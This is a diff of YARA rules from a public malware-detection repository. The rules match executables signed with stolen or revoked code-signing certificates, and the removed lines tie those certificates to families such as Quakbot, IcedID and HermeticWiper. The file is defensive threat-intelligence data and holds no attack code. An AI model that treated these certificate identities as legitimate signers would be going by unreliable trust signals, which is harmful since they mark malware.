+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3150-L3161"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "be6b5a98d5c218c39d8f10bc2a0e443bc8be8a591ab368ee902de4a45a95c8d2"
+		logic_hash = "dc6b65757ceb3818101c8694680d1f44af3726876bef30843cfc2cb51ec6ea02"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cd6aa9a7a4898e42b8361dc3542d0afb72e6deefc0b85ebfb55d282a2982b994"
-		reason = "IcedID"
+		thumbprint = "88d563dccb2ffc9c5f6d6a3721ad17203768735a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BIC GROUP LIMITED" and pe.signatures [ i ] . serial == "10:1d:6a:5a:29:d9:a7:78:07:55:3c:ea:c6:69:d8:53" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TAFFIAS" and pe.signatures [ i ] . serial == "00" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4679C5398A279318365Fd77A84445699 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_9F2492304Fc9C93844Dea7E5D6F0Ec77 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ff4061e7-5e45-596f-9d40-c33661a18e71"
+		id = "73acca59-8362-5d34-b28a-71d141d3013a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8656-L8669"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3163-L3174"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1c591cbb2d35d8dad01ff4ea8c71c8b3a0a5f999f1edfcfc038e47f96d3a3a67"
+		logic_hash = "9c76d5756cc79e96d194addc0e2c2c11fa4341ffa9df8f171f35df76cb9c56c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8fcef52c16987307f4e1f7d4b62304c65aedb952c90bb2ead8321f1e1d7c9a6e"
-		reason = "Quakbot"
+		thumbprint = "33015f23712f36e3ec310cfd1b16649abb645a98"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HURT GROUP HOLDINGS LIMITED" and pe.signatures [ i ] . serial == "46:79:c5:39:8a:27:93:18:36:5f:d7:7a:84:44:56:99" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bbddebeea" and pe.signatures [ i ] . serial == "9f:24:92:30:4f:c9:c9:38:44:de:a7:e5:d6:f0:ec:77" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_282A8A04073Eced658B9770Bda8C0D28 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Dca9012634E8B609884Fe9284D30Eff5 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d735ccfc-3f5e-5858-95ec-f385172ea8e6"
+		id = "f22ef616-c7f1-5036-b303-ef8ae038ec4f"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8671-L8684"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3176-L3189"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "4cfebe55887a2a09293678e4dff2f93f22bec151dada7c84a41ac6deb10b7cc3"
+		logic_hash = "b5d663228a27d5dae46f9f03bd04833b129fc453852cb9cb9fe43e405cdcecca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "5cd4832101eb4f173c43986d5711087c8de25e6fcaef2f333e98a013e29b8373"
-		reason = "RedLineStealer"
+		thumbprint = "60971c18c7efb4a294f1d8ee802ff3d581c77834"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO Betamaynd" and pe.signatures [ i ] . serial == "28:2a:8a:04:07:3e:ce:d6:58:b9:77:0b:da:8c:0d:28" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bebaeefaeba" and ( pe.signatures [ i ] . serial == "dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" or pe.signatures [ i ] . serial == "00:dc:a9:01:26:34:e8:b6:09:88:4f:e9:28:4d:30:ef:f5" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0C48732873Ac8Ccebaf8F0E1E8329Cec : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_781Ec65C3E38392D4C2F9E7F55F5C424 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "dacde33d-3925-52c6-87fd-9f3ead6bfab0"
+		id = "d056fb18-e641-50bb-af86-ea124203f16c"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8686-L8699"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3191-L3202"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "64c61d1bb48d790a2a3da85c6e57b542f0ee8a85296fc3e8c17ea18d8241790d"
+		logic_hash = "00b01a874e29fd2e25200f5e50c7121c3cc4bca614c31dd149d6197088292b35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "14ffc96c8cc2ea2d732ed75c3093d20187a4c72d02654ff4520448ba7f8c7df6"
-		reason = "HermeticWiper"
+		thumbprint = "5d20e8f899c7e48a0269c2b504607632ba833e40"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Hermetica Digital Ltd" and pe.signatures [ i ] . serial == "0c:48:73:28:73:ac:8c:ce:ba:f8:f0:e1:e8:32:9c:ec" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Facacafbfddbdbfad" and pe.signatures [ i ] . serial == "78:1e:c6:5c:3e:38:39:2d:4c:2f:9e:7f:55:f5:c4:24" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Da20761Afbb0463C55B1Ea88Bbc7Ec57 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_Bd1E93D5787A737Eef930C70986D2A69 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "63e4b8f6-64f1-58a2-920a-e1d4b113380b"
+		id = "3b5ec355-9d68-5285-bda0-ddd379ad1cf8"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8716-L8729"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3204-L3215"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a4f6bb9742ab40e8003ea14f9645f0c7f885b461fbeb01164b86ddacbda1113f"
+		logic_hash = "0332d05f0f53ad22516fd41cb10238ad0b92ef49011e9e71a82fa2da1de5e953"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f12dd6e77ffab75870b24dd5bfda5a360843f9e5591e764be9f0a2ac59a710d3"
-		reason = "Quakbot"
+		thumbprint = "921e5d7f9f05272b566533393d7194ea9227e582"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CLEVER CLOSE s.r.o." and pe.signatures [ i ] . serial == "da:20:76:1a:fb:b0:46:3c:55:b1:ea:88:bb:c7:ec:57" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Cdefedddbdedbcbfffbeadb" and pe.signatures [ i ] . serial == "bd:1e:93:d5:78:7a:73:7e:ef:93:0c:70:98:6d:2a:69" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_C51F4Cf4D82Bc920421E1Ad93E39D490 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_B0009Bb062F52Eb6001Ba79606De243D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "cbb6cb90-b0f0-5271-81ae-8639c28a5df1"
+		id = "41293f0b-604a-5993-8b05-9ca639828eec"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8731-L8744"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3217-L3228"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b9152998eb3c4ba2b6e7571ed03c63ae1ade2f922df6901f8e46b08f41474f7b"
+		logic_hash = "111a08d62f483daf23220e7044cc291b6ea6922746d48934f72a892b7dfd762b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d17dc7ef018e13b9a482b60871e25447fb1ae724dfe69b5287dce6b9b78d84a9"
-		reason = "Quakbot"
+		thumbprint = "c89f06937d24b7f13be5edba5e0e2f4e05bc9b13"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CUT AHEAD LTD" and pe.signatures [ i ] . serial == "c5:1f:4c:f4:d8:2b:c9:20:42:1e:1a:d9:3e:39:d4:90" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fbfdddcfabc" and pe.signatures [ i ] . serial == "b0:00:9b:b0:62:f5:2e:b6:00:1b:a7:96:06:de:24:3d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_69A72F5591Ad78A0825Fbb9402Ab9543 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_294E7A2Ccfc28Ed02843Ecff25F2Ac98 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "a30ca6aa-3bf4-5fa2-8297-7b983410e5d4"
+		id = "ae3c0758-7863-54eb-a94f-3c86d5d34d21"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8746-L8759"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3230-L3241"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b2a8c08a612f7352a159a9d3f7d9152d9de043db1ec69e4bb2493533453f8f5c"
+		logic_hash = "75c3093978875c7e523525a3b64bf985139359d9696fdb9dbd7db3e915043194"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "42a6612f4c652b521435989b5f044403649fef6db4fb476f3c4d981dc2f9bdf8"
-		reason = "Quakbot"
+		thumbprint = "a57a2de9b04a80e9290df865c0abd3b467318144"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PUSH BANK LIMITED" and pe.signatures [ i ] . serial == "69:a7:2f:55:91:ad:78:a0:82:5f:bb:94:02:ab:95:43" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Eadbaadbdcecafdfafbe" and pe.signatures [ i ] . serial == "29:4e:7a:2c:cf:c2:8e:d0:28:43:ec:ff:25:f2:ac:98" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_8Cece6Df54Cf6Ad63596546D77Ba3581 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_A61B5590C2D8Dc70A31F8Ea78Cda4353 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c5c19072-5a2f-5851-83bf-25a9e2fd9033"
+		id = "0a22b3a5-cc61-5aec-9fc7-bbd03cd4ab03"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8761-L8774"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3243-L3254"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1980b3ef7df1bfa43d401fdd8393cb8ffb5c919d558c23314ffb9e823cf9590d"
+		logic_hash = "7d57f5cb2691d8dfb5f5ef63f7bfb4290f0bd8d990c61fe0655e35c1b3f554f0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1a9ff8aba1b24e3bd06442ac6d593ff224b685cba4edef79e740f569ab453161"
-		reason = "Malware"
+		thumbprint = "d1f77736e8594e026f67950ca2bf422bb12abc3a"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mikael LLC" and pe.signatures [ i ] . serial == "8c:ec:e6:df:54:cf:6a:d6:35:96:54:6d:77:ba:35:81" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bdddcfaebffbfdcabaffe" and pe.signatures [ i ] . serial == "a6:1b:55:90:c2:d8:dc:70:a3:1f:8e:a7:8c:da:43:53" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_Db95B22362D46A73C39E0Ac924883C5B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_21C9A6Daff942F2Db6A0614D : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "df60473d-da8a-59c1-84d1-717d52d2411d"
+		id = "e09476f7-d48d-58e5-aeca-fffacf569243"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8776-L8789"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3256-L3267"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "29015f6e11f2c93cc12e39cf50a1bda3bd4aa0bb7df0d7374223031361067495"
+		logic_hash = "c466a829d8141ba40187309559f62af73ea47e325eb95ef4c634bac60167788b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "751a7e6c4dbe6e7ca633b91515c9f620bff6314ce09969a3af26d18945dc43b5"
-		reason = "Smoke Loader"
+		thumbprint = "7dd9acb2ef0402883c65901ebbafd06e5293d391"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SPSLTD PLYMOUTH LTD" and pe.signatures [ i ] . serial == "db:95:b2:23:62:d4:6a:73:c3:9e:0a:c9:24:88:3c:5b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ledger SAS" and pe.signatures [ i ] . serial == "21:c9:a6:da:ff:94:2f:2d:b6:a0:61:4d" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_D3Aee8Abb9948844A3Ac1C04Cc7E6Bdf : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1F55Ae3Fca38827Cde6Cc7Ca1C0D2731 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "8b17b23f-3296-55b2-8e7b-40e13a14a610"
+		id = "8a32fa5d-671e-5012-9de1-6afc21751b94"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8791-L8804"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3269-L3280"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9af0b27e96575298a31b53f6f88cdb20934db75637abdd0acb40bb3c6921542c"
+		logic_hash = "1aa7c6c5430f196d1031acabfe141c30044c23c4119619752c50f4665966606e"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "e386450257e170981513b7001a82fb029f0931e5c2f11c6d9b86660da0b89a66"
-		reason = "Quakbot"
+		thumbprint = "a279fa4186ef598c5498ba5c0037c7bd4bd57272"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "HOUSE 9A s.r.o" and pe.signatures [ i ] . serial == "d3:ae:e8:ab:b9:94:88:44:a3:ac:1c:04:cc:7e:6b:df" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Fcceaeafbbdccccddfbbb" and pe.signatures [ i ] . serial == "1f:55:ae:3f:ca:38:82:7c:de:6c:c7:ca:1c:0d:27:31" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6000F8C02B0A15B1E53B8399845Faddf : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_008D1Bae9F7Aef1A2Bcc0D392F3Edf3A36 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6d4224bd-1522-5b0f-b39e-1ba4ec0f1a63"
+		id = "8d1e7615-f462-56eb-9198-30b868572cf1"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8806-L8819"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3282-L3293"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8687b2aa02909af5fc7c706f31c419c4af48225abe7415bf262de57bb85258f"
+		logic_hash = "6b15f97a51f25b1292cc3fd80889ea1edb01814d1951ef1d3b4cac5e83c7fbca"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6f18caa7cd75582d3a311dcc2dadec2ed32e15261c1dc5c9471e213d28367362"
-		reason = "Amadey"
+		thumbprint = "5927654acf9c66912ff7b41dab516233d98c9d72"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SAY LIMITED" and pe.signatures [ i ] . serial == "60:00:f8:c0:2b:0a:15:b1:e5:3b:83:99:84:5f:ad:df" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Beaffbebfeebbefbeeb" and pe.signatures [ i ] . serial == "00:8d:1b:ae:9f:7a:ef:1a:2b:cc:0d:39:2f:3e:df:3a:36" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_F6Ad45188E5566Aa317Be23B4B8B2C2F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_239Ba103C2943D2Dff5E3211D6800D09 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d4afb6ed-1cfd-5c49-8959-0cf136d0e9f0"
+		id = "1444a44e-2f45-547f-a5fc-0941edd506bc"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8821-L8834"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3295-L3306"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7afafea141727e2ed4c1975a18aa77b282c7d9ece5729dbd96cbb49cc2b393f1"
+		logic_hash = "b155ba969334945013af40fbf43b8318a221f6212c4a29e0ee98bc02bb9acafb"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ae7db8b64e8abd9d36876f049b9770d90c0868d7fe1a2d37cf327df69fa2dbfe"
-		reason = "Numando"
+		thumbprint = "d8ea0533af5c180ce1f4d6bc377b736208b3efbb"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Gary Kramlich" and pe.signatures [ i ] . serial == "f6:ad:45:18:8e:55:66:aa:31:7b:e2:3b:4b:8b:2c:2f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bcafaecbecacbca" and pe.signatures [ i ] . serial == "23:9b:a1:03:c2:94:3d:2d:ff:5e:32:11:d6:80:0d:09" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_74Fc9257Bc86F8C618501695Ad4B1606 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_205B80A74A5Dddedea6B84A1E1C44010 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "c0ed5369-ca51-50b8-941a-580262b4f644"
+		id = "43e34fe4-e580-572e-a14e-5ee58b3bf594"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8836-L8849"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3308-L3319"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d6a9956d8bcc717186c205d07b94df1df4818bee58f98bdc128ec569331ab5e6"
+		logic_hash = "1af8527193acdbcb3ba0239879c3b23c6ba4e68d920ae4d5ce503d44e32991f7"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "8ebbb2ab8f2e1366d0137e5026e07fde229f45f39d043c7ad36091b8eb2a923e"
-		reason = "ParallaxRAT"
+		thumbprint = "1a743595dfaa29cd215ec82a6cd29bb434b709cf"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "169Teaco Limited" and pe.signatures [ i ] . serial == "74:fc:92:57:bc:86:f8:c6:18:50:16:95:ad:4b:16:06" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Befadbffde" and pe.signatures [ i ] . serial == "20:5b:80:a7:4a:5d:dd:ed:ea:6b:84:a1:e1:c4:40:10" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3B0914E2982Be8980Aa23F49848555E5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_6C8D0Cf4D1593Ee8Dc8D34Be71E90251 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "bda3e8b2-5d1b-5898-a4c3-318fc88506b8"
+		id = "fe5cbea2-1704-550c-bd2e-82defba20f24"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8851-L8864"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3321-L3332"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b1ced5176720e0a3bd475172a167675de8211987fbae11b93eab1fba6b3629f5"
+		logic_hash = "981e4b426e926bd042f25a50de40d3e3462ed5fec0cf7261523b314b908a1276"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "254e59ea93fa5f2a6af44f9631660f7b6cca4b4c9f97046405bcfed5589a32fa"
-		reason = "ParallaxRAT"
+		thumbprint = "d481d73bcf1e45db382d0e345f3badde6735d17d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Office Rat s.r.o." and pe.signatures [ i ] . serial == "3b:09:14:e2:98:2b:e8:98:0a:a2:3f:49:84:85:55:e5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Dbdbecdbdfafdc" and pe.signatures [ i ] . serial == "6c:8d:0c:f4:d1:59:3e:e8:dc:8d:34:be:71:e9:02:51" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_029Bf7E1Cb09Fe277564Bd27C267De5A : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_7D08A74747557D6016Aaaf47A679312F : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "19d1012f-9a9e-5d84-885c-2571bfd1876c"
+		id = "031cf958-1c37-5190-8fbd-6896f1048c9a"
 		date = "2020-11-19"
 		modified = "2024-10-04"
-		reference = "https://bazaar.abuse.ch/faq/#cscb"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L8866-L8879"
+		reference = "https://github.com/ditekshen/detection"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L3334-L3345"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a8c817dc99d55dcbea31334cc10b6a7ae3b5cf831e28cb2daf9d4b06fb4bec60"
+		logic_hash = "ff7c9635b9b43bef7401861d5dbf984d1e2aa1ea9e4d3df9ad348c552767628e"
 		score = 75
 		quality = 75
